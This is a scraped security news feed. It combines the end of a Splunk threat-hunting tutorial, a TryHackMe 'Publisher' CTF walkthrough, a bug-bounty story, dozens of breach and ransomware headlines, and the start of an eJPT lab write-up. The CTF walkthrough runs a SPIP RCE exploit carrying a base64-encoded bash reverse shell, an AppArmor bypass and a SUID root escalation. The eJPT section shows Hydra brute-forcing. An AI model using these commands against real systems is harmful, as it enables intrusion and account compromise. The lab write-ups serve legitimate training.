country_freq=logins_by_user_country/logins_by_userThis creates a behavioral ratio.Example:1 / 200 = 0.005Meaning:That country accounts for only 0.5% of the user’s login behavior.That’s interesting.Step 4: Filter Rare Behavior| where country_freq < 0.1This keeps only behaviors occurring less than 10% of the time.That threshold defines anomaly sensitivity.Lower threshold:stricter detectionsfewer false positivesHigher threshold:noisier resultsbroader detectionStep 5: Investigation-Friendly Output| table _time user src_ip src_country country_freqCreates readable analyst output.Instead of messy raw events, we now get structured suspicious login candidates.Result:Outlier user:jsmithAnomalous country:JPWhy This MattersTraditional rule-based detection might ignore:“Valid user successfully authenticated.”Behavioral detection asks:“Why is this user suddenly authenticating from Japan?”That context changes everything.Detecting Suspicious Login HoursGeographic anomalies are useful.But attackers can also reveal themselves through strange timing.Example:An employee usually logs in around:1 PMThen suddenly authenticates at:3 AMThat deserves attention.PAYLOADindex=vpnlogs| eval hour=tonumber(strftime(_time, "%H")) + tonumber(strftime(_time, "%M"))/60| eventstats avg(hour) as typical_hour stdev(hour) as stdev_hour by user| eval zscore=abs(hour - typical_hour) / stdev_hour| where zscore > 3| eval hour=round(hour, 2), typical_hour=round(typical_hour, 2)| eval stdev_hour=round(stdev_hour, 2), zscore=round(zscore, 2)| table _time user src_ip src_country hour typical_hour stdev_hour zscore| sort - hour_zscoreThis is practical statistical anomaly hunting.Step 1: Convert Time into Numeric Hours| eval hour=tonumber(strftime(_time, "%H")) + tonumber(strftime(_time, "%M"))/60Examples:13:30 → 13.518:15 → 18.2503:00 → 3.0Why?Because statistical analysis requires numeric values.Step 2: Learn Normal Login Behavior| eventstats avg(hour) as typical_hour stdev(hour) as stdev_hour by userThis calculates:average login hourstandard deviationExample:typical_hour = 13.5stdev_hour = 0.8Meaning:User normally logs in around 1:30 PM, with relatively predictable behavior.Step 3: Calculate Z-Score| eval zscore=abs(hour - typical_hour) / stdev_hourZ-score measures anomaly severity.Interpretation:1 → slightly unusual2 → notable3+ → highly suspiciousExample:Normal:13.5Observed:3.0That’s a major deviation.Step 4: Keep Only Strong Outliers| where zscore > 3This aggressively reduces noise.Only statistically significant anomalies survive.Step 5: Investigation Output| tableCreates structured review output for analysts.ResultSuspicious user:njacksonObserved login:3 AMThat is highly abnormal compared to baseline behavior.Why Statistical Detection Is SmarterNaive rule:Alert on every 3 AM loginProblem:Night-shift employees trigger endless false positives.Behavioral detection instead asks:Is 3 AM unusual for THIS specific user?That’s significantly more intelligent.Real-World TakeawaysThis room reinforces practical SOC investigation workflows.Search & FilteringUseful for:authentication reviewIOC huntingendpoint triagelog scopingCommands used:searchoperatorsfieldsregexStructuringUseful for:timelinesreportinginvestigation readabilityCommands used:tablereverseTransformingUseful for:baseliningsummarizationpattern discoveryCommands used:topstatscharttimechartEnrichmentUseful for:contextual intelligencebusiness-aware detectionsuspicious origin analysisCommands used:iplocationlookupBehavioral DetectionUseful for:compromised account huntinginsider threat detectionVPN anomaly analysisunusual activity detectionCommands used:eventstatsevalwherestatistical logicFinal ThoughtsSplunk SPL is far more than just query syntax.It is investigative thinking translated into search logic.The real shift happens when you move from:“I have logs.”to:“I understand what happened.”That’s where analysts become hunters.OutroIf this walkthrough helped you, feel free to connect with me:GitHub: https://github.com/AdityaBhatt3010LinkedIn: https://www.linkedin.com/in/adityabhatt3010/Medium: https://medium.com/@adityabhatt3010More writeups soon. Cleaner, deeper and built from too many late-night labs.If you found this useful, consider starring the repository and following my cybersecurity journey.Splunk Exploring SPL: A Practical SOC Analyst Walkthrough for Search, Detection, and Threat Hunting was originally published in InfoSec Write-ups on Medium, where people are continuing the conversation by highlighting and responding to this story.

SPIP RCE + Docker SUID Escape | THM Publisher

Sun, 07 Jun 2026 16:46:43 +0200

Hello Friend,Welcome to another TryHackMe challenge PublisherStep 1 — Nmap ReconnaissanceWe begin with an aggressive Nmap scan to identify open ports and running services on the target machine.Nmap ResultThe HTTP title reveals SPIP CMS is running — this is a known vulnerable CMS. Version enumeration is the next priority.Step 2 — Web Enumeration (FFUF)Navigate to the web server. The homepage shows a SPIP-based Community Magazine. We run directory fuzzing to find hidden paths.ffuf -u http://10.65.183.106/FUZZ -w /usr/share/seclists/Discovery/Web-Content/big.txtFuzzing with FUZZ to find the hidden directory and filesStep 3 — Version Detection (Whatweb)We use WhatWeb to fingerprint the exact version of SPIP running on the target.whatweb http://10.65.183.106/spipversion detectionSPIP 4.2.0 is confirmed. This version is vulnerable to CVE -2023–27372 an unauthenticated remote code execution vulnerability via the oubli parameter in the password reset form. this github link contain the exploitaion code with usage.Step 4 — RCE via CVE-2023–27372We use a public Python exploit to gain initial remote code execution as www-data.python CVE-2023-27372.py -u http://10.64.179.228/spip -c 'echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEzOS4yMTEvNDQ0NCAwPiYx|base64 -d>shell.php'Confirm code execution by testing the id command via the page parameter:RCEWe have remote code execution as www-data. Next we enumerate the system for privilege escalation paths.Step 5 — LFI & system enumerationUsing the RCE, we read /etc/passwd to identify users on the system./etc/passwdUser ‘think’ exists with UID 1000 — a regular user with a home directory at /home/think. Likely has SSH access. We check if think has an exposed SSH private key:id_rsa key foundStep 6 — SSH Access as thinkRead the private key using RCE, save it locally, set permissions, and SSH in:logged in as think userthink user contain the user flag in user.txtStep 7 — Privilege escaltion EnumerationNow we hunt for a path to root. We search for SUID binaries:SUID binariesin this /usr/sbin/run_conatainer is a custom binary which looks like suspicious! . We use strings to reveal what the binary executes internally:The SUID binary run_container calls /opt/run_container.sh — if we can write to that script, we can execute commands as root.Step 8 — SUID Escape to RootExecute run_container to understand its behavior:cd /opt && run_containerList of Docker containers:ID: 41c976e507f8 | Name: jovial_hertz | Status: Up 4 hoursOPTIONS: 1) Start 2) Stop 3) Restart 4) Create 5) QuitEscape via Dynamic Linker : We use the dynamic linker/loader to invoke bash bypassing AppArmor restrictions/lib/x86_64-linux-gnu/ld-linux-x86–64.so.2 /bin/bashThis directly invokes the dynamic linker to load /bin/bash, circumventing AppArmor profile restrictions on the container binary.Inject Shell into run_container.sh : Append a bash -p (privileged shell) command to the script, then trigger via the SUID binaryecho 'bash -p' >> /opt/run_container.shrun_container# Select option 1 (Start Container)bash-5.0# whoamirootrootin /root/root.txt we will find the final flag.Thank you for reading. If you wnat learn about the fuzzing read this blog🔍 Discover Hidden Attack Surfaces with FFUF FuzzingIf this helped you, connect with me:Twitter/X : https://x.com/cybervolt07YouTube: https://www.youtube.com/@cybervolt07Like • Share • Subscribe for more CTF walkthroughs!SPIP RCE + Docker SUID Escape | THM Publisher was originally published in InfoSec Write-ups on Medium, where people are continuing the conversation by highlighting and responding to this story.

Update: The Ending of My $500 Loss and Web Cache Poisoning Story.

Sun, 07 Jun 2026 16:46:53 +0200

By kjuliusIn my previous article, I published a story about how losing $500 unexpectedly led me back to a Web Cache Poisoning vulnerability that I had previously documented and forgotten about.If you haven’t read the original story, you can find it here: https://medium.com/bugbountywriteup/when-bug-bounty-hunting-hit-me-back-how-losing-500-led-me-to-a-web-cache-poisoning-bug-36fb2f196b9aAt the time of writing that article, there were still a lot of unanswered questions. The account remained active, the charge had already gone through, and I wasn’t sure how the situation would eventually end.Well, here’s the update.The Account Was Eventually Deactivated.Over the following weeks, I started receiving multiple payment reminder emails from the service.The emails ranged from payment notifications to overdue invoice reminders and eventually account-blocking notices.Proof of Concept Image.At first, I ignored them because I had already contacted both the company and my bank regarding the charge.Then one day, I logged back into the account and noticed a message stating that the account had been temporarily deactivated due to unpaid invoices.Shortly afterward, the service access was effectively disabled and the subscription was no longer active.Proof of Concept Image.At that point, it became clear that the account would not remain active indefinitely.The Unexpected Refund.The most surprising part came later.A few days after the account was deactivated, the money that had been debited from my account was returned.Since the day I noticed the original charge, I had immediately contacted my bank, cancelled the card, and requested a dispute/chargeback investigation.Because of that, I believe the refund was most likely the result of the bank’s dispute process rather than a direct refund from the company.I cannot say that with complete certainty, but the timing strongly suggests it.Either way, seeing that notification was a huge relief.Proof of Concept Image.Looking Back.When the entire situation started, I honestly thought the money was gone for good.Instead, several things happened:The account was eventually deactivated.The subscription was cancelled.The disputed funds were returned.The cache poisoning bug I discovered turned out to be a duplicate.Not exactly the ending I expected.I didn’t receive a bounty.I didn’t keep the subscription.And I didn’t get a unique vulnerability report accepted.But I did get my money back.And sometimes that’s a win on its own.Final Thoughts.One thing bug bounty hunting teaches you very quickly is that not every story ends with a payout.Sometimes you find a valid bug and lose the race.Sometimes you spend weeks investigating something that goes nowhere.And sometimes life throws unexpected distractions right in the middle of a hunt.What matters is continuing to learn and continuing to improve.The duplicate report was disappointing.The $500 charge was frustrating.But the experience itself was valuable.The hunt continues.And as I’ve learned many times before:As long as software continues to evolve, there will always be vulnerabilities waiting to be discovered.Never give up, till we meet again… 🙏Update: The Ending of My $500 Loss and Web Cache Poisoning Story. was originally published in InfoSec Write-ups on Medium, where people are continuing the conversation by highlighting and responding to this story.

The 5 Skills Every Cybersecurity Engineer Needs in 2026 (That Universities Still Aren’t Teaching)

Sun, 07 Jun 2026 16:47:23 +0200

Are you prepping for a cybersecurity market that does not exist ?Continue reading on InfoSec Write-ups »

The Most Dangerous Security Bug Is the One That Feels Like a Feature

Sun, 07 Jun 2026 16:47:28 +0200

A single click should not carry the weight of your entire developer identity.Continue reading on InfoSec Write-ups »

Pragmata: Alle Fundorte der Storage Expander | GAMES.GG

Sun, 07 Jun 2026 08:02:58 +0200

Dianas Hacking-Anzeige ist eines der mächtigsten Werkzeuge in Pragmata, und Storage Expander sind die Collectibles, die ihr Limit nach oben ...

Das Vertrauen in KI wird nach dem Meta-AI-Vorfall in Frage gestellt. - Vietnam.vn

Sun, 07 Jun 2026 02:42:13 +0200

(Baohatinh.vn) – Neue Angriffe beschränken sich nicht mehr auf die Ausnutzung technischer Schwachstellen, sondern zielen direkt darauf ab, ...

I drove 25,000 miles with CarPlay last year - here are the apps I used most (and why)

Sun, 07 Jun 2026 03:00:51 +0200

I spend a lot of time driving. These are the CarPlay apps that make every trip easy.

Sendung - Die Pfefferkörner (214) am Sa., 04.07.2026 - Das Erste - WDR

Sat, 06 Jun 2026 13:14:19 +0200

Tarun hat es mit seiner Erfindung, einem smarten Assistenz-Computer für Rollstuhlfahrer – und damit auch für Pippa - bis in die letzte Runde eines ...

Ruag-Hack: Warum die Lösegeldzahlung weitere Cyberangriffe anziehen könnte

Sat, 06 Jun 2026 23:30:01 +0200

Experten zu Ruag-Fall: Lösegeld an Hacker gezahlt – «bestes Signal an Kriminelle». Die Ruag hat Hackern Lösegeld bezahlt. Cybersecurity-Experten ...

U.S. CISA adds SolarWinds Serv-U flaw to its Known Exploited Vulnerabilities catalog

Sat, 06 Jun 2026 23:44:53 +0200

U.S. Cybersecurity and Infrastructure Security Agency (CISA) adds SolarWinds Serv-U flaw to its Known Exploited Vulnerabilities catalog. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) added SolarWinds Serv-U flaw, tracked as CVE-2026-28318 (CVSS ver 3.1 score of 7.5), to its Known Exploited Vulnerabilities (KEV) catalog. SolarWinds Serv-U is a managed file transfer (MFT) and secure file […]

Malware-Angriffe: Loader-Kampagnen springen um 98,3 Prozent

Sat, 06 Jun 2026 22:59:04 +0200

Sicherheitsforscher warnen vor immer raffinierteren Cyberangriffen mit KI und Schadsoftware, die sich als NVIDIA-Komponenten tarnt.

Silent Ransom Group: Hacker dringen persönlich in Büros ein - BornCity

Sat, 06 Jun 2026 23:54:24 +0200

Hacker nutzen legitime Google-Infrastruktur für Phishing und Erpressung. FBI und Sicherheitsforscher warnen vor neuen, ...

Spionage als Service: Staaten lagern Überwachung an private Firmen aus

Sat, 06 Jun 2026 21:00:27 +0200

Regierungen lagern Überwachung zunehmend an private Anbieter aus. Neue Methoden nutzen Werbedaten statt Hacking, während US-Geheimdienste Stellen ...

Cyber-Versicherungen: Ablehnungsquote steigt auf 33 Prozent - Börse Express

Sat, 06 Jun 2026 15:48:03 +0200

Ruag zahlte trotz Warnung des Bundesamts für Cybersicherheit Lösegeld an die Gruppe Akira. Der Vorfall zeigt die anhaltende Bedrohung durch ...

Indische Schuldatenbank: 30 Millionen Datensätze waren ungeschützt - Ad-hoc-news.de

Sat, 06 Jun 2026 15:10:19 +0200

Nach massiven Sicherheitslücken bei der CBSE halfen IIT-Experten, die Systeme zu sichern. Ein ethischer Hacker deckte die Schwachstellen auf.

Anthropic warnt: Hacker setzen zunehmend KI für Cyberangriffe ein - Newsbit.de

Sat, 06 Jun 2026 17:21:27 +0200

Cyberkriminelle nutzen immer öfter künstliche Intelligenz für Cyberangriffe. Dies geht aus einer neuen Studie des KI-Unternehmens Anthropic ...

„Die Geheimdienste werden privatisiert“: Das neue Zeitalter der Handy-Spionage

Sat, 06 Jun 2026 19:49:40 +0200

„Es gibt eine neue Form der Überwachung, die kein Hacking braucht“, sagt. Bild vergrößern. „Es gibt eine neue Form der Überwachung, die kein Hacking ...

CareerConnect-Hack: Hacker erbeuten Daten von Alumni und Arbeitgebern

Sat, 06 Jun 2026 19:16:13 +0200

Unbekannte erbeuten Namen und E-Mails von Oxford-Alumni über die Karriereplattform CareerConnect. Interne Uni-Systeme blieben verschont.

Wie viel Geld Hacker von ihren Opfern verlangen - Nau.ch

Sat, 06 Jun 2026 17:37:41 +0200

Der Rüstungskonzern Ruag hat nach einem Cyberangriff auf eine Tochterfirma Lösegeld an Hacker bezahlt. Wie hoch der Betrag war, ...

Report: Anthropic Deploys Engineers to Support NSA Use of Mythos

Sat, 06 Jun 2026 18:18:53 +0200

Reports claim Anthropic engineers are helping the NSA use its restricted AI model Mythos, known for advanced cybersecurity capabilities. This week, the Financial Times reported that Anthropic has placed approximately six “forward-deployed” engineers inside the National Security Agency to help the intelligence agency use Mythos, its most capable cyber model, for offensive operations. Two people […]

Hacker haben die KI von Meta ausgetrickst und so die Kontrolle über Instagram-Konten erlangt.

Sat, 06 Jun 2026 12:53:11 +0200

AI - Ảnh 1. Hacker nutzten den Chatbot von Meta, um Instagram-Konten zu kapern. Meta hat sich kürzlich zu einem Sicherheitsvorfall im Zusammenhang ...

Chinesische Hacker-Gruppe TA4922 steigert Angriffstempo auf Deutschland - it-daily.net

Sat, 06 Jun 2026 13:25:58 +0200

Die chinesischsprachige Hacker-Gruppe TA4922 weitet ihre Angriffe massiv auf Europa aus und nutzt dafür KI-generierte Phishing-Kampagnen.

Magecart-Kampagne: Hacker stehlen Kartendaten über Stripe und GTM - BornCity

Sat, 06 Jun 2026 14:46:28 +0200

Hacker kapern Checkout-Seiten via Stripe-API und Google Tag Manager. Neue Betrugswelle trifft Magento-Shops und Kunden.

Lösegeld an Hacker gezahlt – «bestes Signal an Kriminelle» - MSN

Sat, 06 Jun 2026 15:44:19 +0200

Lösegeld an Hacker gezahlt – «bestes Signal an Kriminelle» ... Vor 50 Min. ... Die Hackergruppe Akira stahl im vergangenen Herbst grosse Datenmengen von ...

Trotz Warnung: Bundeskonzern Ruag zahlt Lösegeld an Hackergruppe - News - SRF

Sat, 06 Jun 2026 16:32:28 +0200

Der Bund rät dringend davon ab, Hackern Lösegeld zu zahlen. Der Rüstungskonzern Ruag tat es trotzdem.

Google warnt: Angreifer geben sich als IT-Techniker aus und betreten Büros | heise online

Sat, 06 Jun 2026 16:52:08 +0200

Haben die Hacker alle Daten, die sie brauchen, senden sie eine Erpressermail an die Firma und drohen mit der Veröffentlichung. Das FBI empfiehlt unter ...

AI-Powered Penetration Testing with Metasploit

Sat, 06 Jun 2026 13:26:53 +0200

Overview This article documents an end-to-end agentic penetration test. Claude Desktop, connected to the Metasploit Framework through the Model Context Protocol (MCP), turns plain-English tasks The post AI-Powered Penetration Testing with Metasploit appeared first on Hacking Articles.

Dashlane-Angriff: Hacker knackten 2FA-Codes per Brute-Force - Ad-hoc-news.de

Sat, 06 Jun 2026 09:25:54 +0200

Hacker erbeuten durch Brute-Force-Angriff auf API verschlüsselte Tresore von weniger als 20 Dashlane-Nutzern.

Dashlane-Attacke: Hacker umgehen 2FA, erbeuten 20 Passwort-Tresore - Ad-hoc-news.de

Sat, 06 Jun 2026 09:27:51 +0200

Hacker umgehen Dashlanes 2FA und stehlen verschlüsselte Tresore. Die Zero-Knowledge-Architektur verhindert jedoch die Entschlüsselung der Daten.

Elefant, Tiger & Co.: Amarenakirsche auf Eis (1181) - hier anschauen - ARD Mediathek

Sat, 06 Jun 2026 09:38:07 +0200

... Kollegin Martina Hacker. 45 Min. Leipzigs Unterwasserwelt – Das neue Zoo-Aquarium. Der Osten - Entdecke wo du lebst ∙ MDR. Ab 0UTAD · 89 Min. Best ...

Entgegen Bundesempfehlung: Ruag hat nach Hackerangriff Lösegeld an Erpresser bezahlt

Sat, 06 Jun 2026 10:32:27 +0200

Der bundeseigene Rüstungskonzern Ruag hat nach einem Cyberangriff Lösegeld an Hacker bezahlt. 06.06.2026 09:08.

Auftakt zum „Fest der Vereine“: Herzogenaurach feiert das 49. Altstadtfest - NN.de

Sat, 06 Jun 2026 10:42:59 +0200

Herzogenaurach - Drei Tage lang wird in Herzogenaurach gefeiert. Die Vereine locken mit Angeboten auf dem Schlossplatz, dem Marktplatz und in der ...

Wie viel Geld Hacker von ihren Opfern verlangen - Cash

Sat, 06 Jun 2026 10:46:30 +0200

Der Rüstungskonzern Ruag hat nach einem Cyberangriff auf eine Tochterfirma Lösegeld an Hacker bezahlt. Wie hoch der Betrag war, will.

Ruag hat nach Hackerangriff Lösegeld an Erpresser bezahlt | Nau.ch

Sat, 06 Jun 2026 11:07:28 +0200

Der Bundeskonzern Ruag hat nach einem Hacker-Angriff im letzten Herbst Lösegeld bezahlt. · Üblicherweise rät der Bund dringend davon ab, bei einer ...

Meta behebt Sicherheitslücke, nachdem ein KI-Chatbot ausgenutzt wurde, um die Accounts ...

Sat, 06 Jun 2026 11:08:34 +0200

(GLO) - Meta hat soeben bestätigt, dass eine schwerwiegende Sicherheitslücke in seinem KI-gestützten System behoben wurde, nachdem Hacker diese ...

Chinesische Hacker: UNC5221 blieb 18 Monate unentdeckt - Börse Express

Sat, 06 Jun 2026 11:08:55 +0200

Die Hacker spezialisieren sich auf Netzwerkgeräte und Speichersysteme wie Egnyte Storage Sync, pfSense-Firewalls und Synology NAS-Geräte. Nach dem ...

DoubleClick-Missbrauch: Hacker nutzen Googles Netzwerk für Malware - BornCity

Sat, 06 Jun 2026 12:39:50 +0200

Hacker nutzen vertrauenswürdige Werbeinfrastruktur, um Schadsoftware zu verbreiten und Windows-11-Systeme zu infiltrieren.

KI-Sicherheit: Meta und OpenAI verlieren Kontrolle über Systeme - BornCity

Sat, 06 Jun 2026 11:09:39 +0200

Darunter: Hacking-Tipps und Anleitungen für Biowaffen. Jedes getestete Modell wies Sicherheitslücken auf. Forschung: Feintuning macht KI-Modelle ...

Claude Opus Found a Four-Year-Old Hole in Zcash’s Privacy Layer. Nobody Knows If Someone Already Used It.

Sat, 06 Jun 2026 09:53:05 +0200

Claude Opus 4.8 helped uncover a four-year-old critical flaw in Zcash that could have enabled undetectable creation of counterfeit coins. On May 29, the security researcher Taylor Hornby found a critical vulnerability in Zcash Orchard privacy pool using Claude Opus 4.8. The Zcash team hired Hornby specifically to look for this kind of issue. He […]

Opinion: How much value is AI really creating? - Golem.de

Sat, 06 Jun 2026 03:31:42 +0200

Eye-opening changes to the speed and volume of work are not always translating into genuine productivity.

Ransomware-Attacke: ShinyHunters erbeuten 3,65 TB von 275 Mio. Nutzern

Sat, 06 Jun 2026 06:44:55 +0200

Zwischen 2013 und 2016 sollen die Hacker mehr als 200 Systeme in 18 Ländern kompromittiert haben. Rund 400 Konten waren betroffen, über 56.000 ...

Ultrahuman: Hacker erbeuteten Wellness-Daten über Malware-gestohlene Logins

Sat, 06 Jun 2026 06:45:09 +0200

Ultrahuman meldet einen Hackerangriff: Malware stahl Mitarbeiter-Logins, Angreifer griffen über ein internes Analytics-System auf Wellness-Daten ...

Ruag zahlte Lösegeld an Hacker – und verteidigt den Entscheid - 20 Minuten

Sat, 06 Jun 2026 07:55:59 +0200

Ein Bundesbetrieb hat entgegen den Empfehlungen des Bundesamts für Cybersicherheit Lösegeld an Hacker bezahlt. Die Hackergruppe Akira hatte im Herbst ...

Cyberangriff auf Dortmunder Firma: „Wir wissen nicht, woher das kommt“ - Ruhr Nachrichten

Sat, 06 Jun 2026 08:50:36 +0200

Ein Dortmunder Online-Händler kämpft tagelang mit einem lahmgelegten Shop. Der Schaden bleibt überschaubar. Doch die eigentliche Sorge bleibt.

Entgegen den Warnungen des Bundes: Ruag bezahlte Lösegeld an Hacker - Watson

Sat, 06 Jun 2026 07:48:30 +0200

Der Bundeskonzern Ruag hat trotz eindinglicher Warnung des Bundes nach einem Hacker-Angriff im vergangenen Herbst Lösegeld bezahlt.

Malware-Welle: Hacker nutzen GTA VI und WM 2026 für Massendiebstahl - Ad-hoc-news.de

Fri, 05 Jun 2026 16:35:47 +0200

Hacker nutzen die Vorfreude auf GTA VI und die FIFA-WM 2026 für massiven Betrug. Cybersicherheitsforscher haben eine Reihe groß angelegter Malware ...

KI treibt Wirtschaftskriminalität: Unternehmen erwarten deutlichen Anstieg - Retail-News.de

Sat, 06 Jun 2026 02:40:27 +0200

Hacker und Programmiercode als Symbol fuer Cyber Crime · KI treibt Wirtschaftskriminalität: Unternehmen erwarten deutlichen Anstieg. 6. Juni 2026.

Cyber-Attacken: Hacker brauchen nur 21 Sekunden für Systemübernahme - BornCity

Sat, 06 Jun 2026 01:24:02 +0200

Gleichzeitig missbrauchen Hacker vermehrt Kommunikationsplattformen wie Microsoft Teams und Google-Dienste, um Schadsoftware zu verbreiten. Die ...

KI-Hacking: Automatisierte Schwachstellenanalyse wird zum Enterprise-Risiko - it boltwise

Fri, 05 Jun 2026 22:57:36 +0200

Genau dann wird KI-Hacking gefährlich, weil Angriffe nicht nur schneller werden, sondern auch die Angriffsfläche größer ist: technische Altlasten, ...

Kelp-DAO-Hacker wäscht nach Arbitrum-Freeze rund 220 Millionen Dollar ab - it boltwise

Fri, 05 Jun 2026 17:10:15 +0200

Nach dem Kelp-DAO-Bridge-Exploit hat der Angreifer laut Arkham Intelligence fast 220 Mio. $ gewaschen. Nur 1,7 Mio.

Per Bluetooth und USB: PC über angeschlossene Soundbar gehackt - Golem.de

Fri, 05 Jun 2026 21:18:17 +0200

Der estnische Sicherheitsforscher Rasmus Moorats, der schon früher durch spannende Hacking-Projekte aufgefallen ist, hat Sicherheitslücken in seiner ...

Mann aus Saskatoon sieht sich wegen Krypto-Hacking-Vorwürfen mit Auslieferung an die ...

Fri, 05 Jun 2026 21:52:29 +0200

Ein Mann aus Saskatoon namens Ryan Roach könnte an die Vereinigten Staaten ausgeliefert werden, um sich wegen Hacking-Anklagen im Zusammenhang mit ...

Google und FBI warnen: Hacker geben sich als falsche IT-Mitarbeiter in Büros aus

Fri, 05 Jun 2026 19:21:06 +0200

Google und das FBI haben vor den neuen Taktiken der Cyberkriminellen-Gruppe Silent Ransom Group gewarnt, die Anwaltskanzleien angreift. Hacker ...

Letzte Börsentransaktionen von Douglas Hacker | MarketScreener

Fri, 05 Jun 2026 10:52:42 +0200

Douglas Hacker · Latest insider transactions · Estimated holdings · Related news feed · Professional network · Career timeline.

Meta Patch wurde verwendet, um das Konto des ehemaligen US-Präsidenten Obama zu hacken.

Fri, 05 Jun 2026 12:11:46 +0200

Hacker nutzten eine Sicherheitslücke in Metas KI-gestütztem Kontosicherheitssystem aus. Foto: The Independent . Eine schwerwiegende ...

Meta-Sicherheitslücke: Hacker nutzen KI-Chatbot für Account-Übernahmen

Fri, 05 Jun 2026 14:35:45 +0200

Hacker nutzen KI-Chatbot-Schwachstelle bei Meta aus. Parallel wachsen Reparaturnetzwerke und der Gebrauchtmarkt für Hardware-Komponenten.

Ist Open-Source-Software sicher? Pro und Kontra - COMPUTER BILD

Fri, 05 Jun 2026 14:57:44 +0200

Bei Open-Source-Software können aber auch Cracker (böswillige Hacker; meist nur "Hacker" genannt) Sicherheitslücken im Quellcode finden und diese ...

Krypto-Hacker verlieren an Schlagkraft: DeFi-Schäden brechen massiv ein - FXStreet

Fri, 05 Jun 2026 15:42:56 +0200

Krypto-Hacker verlieren an Schlagkraft: DeFi-Schäden brechen massiv ein ... Die Verluste durch Angriffe auf dezentrale Finanzanwendungen (DeFi) sind ...

BRICKSTORM-Malware: Chinesische Hacker bleiben 18 Monate unentdeckt

Fri, 05 Jun 2026 16:11:32 +0200

Staatliche Hacker nutzen BRICKSTORM-Malware für monatelange Spionage auf ungeschützten Linux-Geräten in Firmennetzen.

Hacker stehlen verschlüsselte Passwortmanager-Tresore: Warum die Logins der User ...

Fri, 05 Jun 2026 16:20:19 +0200

Ein bekannter Passwortmanager und dessen Nutzer:innen wurden von Cyberkriminellen attackiert. Die Angreifer:innen konnten dabei verschlüsselte ...

Hacker stehlen verschlüsselte Passwortmanager-Tresore: Warum die Logins der User ...

Fri, 05 Jun 2026 17:07:41 +0200

Ein bekannter Passwortmanager und dessen Nutzer:innen wurden von Cyberkriminellen attackiert.

Cyber-Schock: Hacker legen Neuwoges lahm – Mieter, Pflegeheim und Tierheim betroffen

Fri, 05 Jun 2026 17:41:08 +0200

Cyber-Schock: Hacker legen Wohnungsunternehmen lahm – Mieter, Pflegeheim und Tierheim betroffen. Die Neuwoges, der kommunale Vermieter in ...

Was ist eigentlich das «Darknet»? - Wissen - SRF

Fri, 05 Jun 2026 17:45:18 +0200

Es klingt dunkel und mysteriös: Die Unterwelt des Internets, wo sich Schurken und Hacker herumtreiben. Doch was ist das Darknet wirklich? Autor ...

Razzia auf Hof bei Kiel: Das sagt IT-Experte zum Spionagevorwurf - SHZ

Fri, 05 Jun 2026 17:57:21 +0200

Nach einem Hacker-Angriff auf die Marine ist der Hof eines IT-Experten bei Kiel durchsucht worden. Nun äußert sich der IT-Experte selbst zu dem ...

Hacker erbeuten sensible Patientendaten: So ist unsere Region betroffen

Fri, 05 Jun 2026 18:24:42 +0200

Unzählige teils sensible Patientendaten hatten Hacker bei einem Angriff auf das System eines externen Abrechnungsdienstleisters im April abgegriffen.

Kali365-Angriffe: 126 Server, 230 Euro/Monat, 80 Mio. MAX-Nutzer bedroht - BornCity

Fri, 05 Jun 2026 18:28:20 +0200

Im Visier der Hacker stehen unter anderem Okta Single Sign-On (SSO), der Messenger MAX, Xerox DocuShare sowie Cloud- und Mailanbieter wie AWS, GMX und ...

Instagram-Hack: KI-Bot ermöglichte Übernahme prominenter Konten - BornCity

Fri, 05 Jun 2026 18:28:27 +0200

Hacker übernahmen prominente Instagram-Profile durch Manipulation von Metas KI-Support. Ein Notfall-Patch wurde ausgerollt.

Angst vor Russland: Hacker entschuldigen sich bei attackierter Firma - Golem.de

Fri, 05 Jun 2026 18:53:31 +0200

Ein Cyberakteur entpuppt sich als "Ransomware-Trottel des Tages". Er hat ein Ziel attackiert, das ihm wirklich Probleme bereiten kann.

NSA nutzt Anthropic-Modell Mythos für Cyberoperationen - Zamin.uz

Fri, 05 Jun 2026 18:02:44 +0200

Dies wurde von Techcrunch.com berichtet . Derzeit liegen keine genauen Informationen vor, dass Ingenieure oder das Mythos-Modell direkt in Hacking- ...

I traveled 2,700 miles with Sony, Apple, and Sennheiser headphones - this pair sounded the best

Fri, 05 Jun 2026 18:50:00 +0200

Air travel is the true test for ANC headphones and earbuds. My multiple journeys revealed all the strengths and weaknesses of these latest models.

I had ChatGPT build me a free PDF editor because I didn't trust it to change my files - it worked!

Fri, 05 Jun 2026 16:06:19 +0200

The smartest way to use AI may not be letting it touch your files, but asking it to write software that handles them safely - in the time it takes to make dinner.

PCPJack Exposed: Researchers Uncover 230-Node Cloud Email Relay Network

Fri, 05 Jun 2026 12:19:21 +0200

Researchers uncovered a 230-node cloud-based email relay network after the actor PCPJack accidentally exposed tools, logs, and C2 files online A threat actor tracked as PCPJack compromised 230 cloud servers across Amazon Web Services, Google Cloud, and Microsoft Azure and turned them into a covert email relay network. Hunt.io researchers discovered the operation because PCPJack […]

“Bug Bounty Bootcamp #44: No Login?

Fri, 05 Jun 2026 08:40:01 +0200

You stumble on a login page. No “Register”, no “Forgot Password”. Just two lonely text boxes staring back at you. Most hunters give up…Continue reading on InfoSec Write-ups »

Host & Network Penetration Testing: System-Host Based Attacks CTF 1 — eJPT (INE)

Fri, 05 Jun 2026 08:40:13 +0200

A walkthrough covering HTTP brute-forcing, WebDAV exploitation, and SMB enumeration to capture all four flagsHello everyone! 👋In this blog, I’ll walk through the System/Host-Based Attacks CTF 1 from INE’s eJPT path and explain how I approached each flag. The focus is on methodology and reasoning — not just dropping commands.This lab has two Windows targets: target1.ine.local and target2.ine.local. The goal is to capture four flags hidden across both machines using system and host-based attack techniques.Useful files provided by the lab:/usr/share/metasploit-framework/data/wordlists/common_users.txt/usr/share/metasploit-framework/data/wordlists/unix_passwords.txt/usr/share/webshells/asp/webshell.aspSo, let’s dive in.Q. User ‘bob’ might not have chosen a strong password. Try common passwords. (target1.ine.local)As usual, I started with an Nmap scan to identify the running services.nmap -sV -sC -T5 target1.ine.localNmap scan resultsThe scan showed that port 80 was open running Microsoft IIS 10.0, but it returned a 401 Unauthorized — meaning it was protected by HTTP Basic Authentication. Ports 135, 139, 445 (SMB), and 3389 (RDP) were also open.I navigated to http://target1.ine.local in the browser and it immediately asked for credentials.The site was asking for authentication.Since the question already hinted that Bob might have a weak password, I decided to brute-force his password using Hydra and a common password list.hydra -l bob -P /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt target1.ine.local http-get /Hydra ResultHydra successfully identified Bob’s password.Now I had valid credentials. I logged in, I didn’t find anything useful on the homepage, so I moved on to directory enumeration with DIRB.dirb http://target1.ine.local -u bob:DIRB ResultDIRB found two directories — /aspnet_client/ and /webdav/. The WebDAV directory 